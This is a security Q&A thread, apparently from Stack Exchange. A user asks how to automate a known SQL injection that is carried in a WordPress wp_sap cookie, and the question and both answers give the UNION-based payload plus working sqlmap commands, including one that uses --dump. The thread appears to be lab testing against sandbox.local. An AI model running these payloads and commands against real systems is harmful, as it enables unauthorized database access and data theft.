3

I'm using an existing exploit which calls for a cookie called wp_sap to be set with the following value:

["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]

This works great manually. Now, I'd like to be able to use this within SQLMap to enumerate the database automatically but have been struggling. I've tried the following variations to no avail.

sqlmap --cookie "wp_sap=[\"1650149780')) OR 1=2 " -u http://sandbox.local -p "wp_sap" --dbms "MariaDB" --suffix "#]" --level 5 --technique U -proxy http://127.0.0.1:8080

sqlmap --cookie="wp_sap=*" -u http://sandbox.local -p "wp_sap" --dbms="MariaDB" --prefix "[\"1650149780')) OR 1=2" --suffix "11#]" --level 5 --technique U -proxy http://127.0.0.1:8080

sqlmap --cookie="wp_sap=[\"1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,*" -u http://sandbox.local -p "wp_sap" --dbms="MariaDB" --suffix ",11#]" --level 5 --technique U -proxy http://127.0.0.1:8080

I'd really appreciate some help to get this working.

schroeder
  • 123,438
  • 55
  • 284
  • 319
Rey Bango
  • 181
  • 1
  • 2
  • 7

2 Answers2

4

First of MariaDB is supported through MySQL engine in SQLmap so the parameter you have there --dbms "MariaDB" is wrong. There are different reasons that each of your three commands are not working.

  • First one does not include an injection point.
  • Second the suffix you use is wrong as it misses the double quote that closes the escaped quote from the prefix.
  • The cookie format is wrong and the suffix is wrong as well.

The reason why it was suggested to use the -r flag is because it reads the request directly from a file and therefore there are less chances to make the mistakes you did.

Eventually you can make this work with a prefix/suffix or with an injection point or with the request from a file or even with a tamper script. Easiest thing would be the injection point so here is a command that should be working.

sqlmap --url='http://sandbox.local/' --cookie="wp_sap=[\"1650149780')) OR 1=2 *#\"]" --dbms=mysql --union-cols=10-12 --technique U

The * notes the position for the payload, the double quotes are escaped \" and I specified the --union-cols to be of that value as you show that the manual payload that worked has more than 10 columns and by default sqlmap reaches up to 10 without increasing the level. Also in case the injection does not work with NULL values you might want to test it with --union-char=1 parameter!

kampias
  • 141
  • 3
2

If you got it manually, then look into doing it again with burp and copying the request. Then pass the request to sqlmap with -r.

For example, say you saved the request to a file called request.txt, your sqlmap would look like this:

sqlmap -r request.txt --dbms=mysql --technique U --union-cols 11 --dump

Obs: you have to put a * on request.txt to specify the injection target to sqlmap

gmelodie
  • 105
  • 5
DapperDaniel
  • 29
  • 1
  • 1
  • 4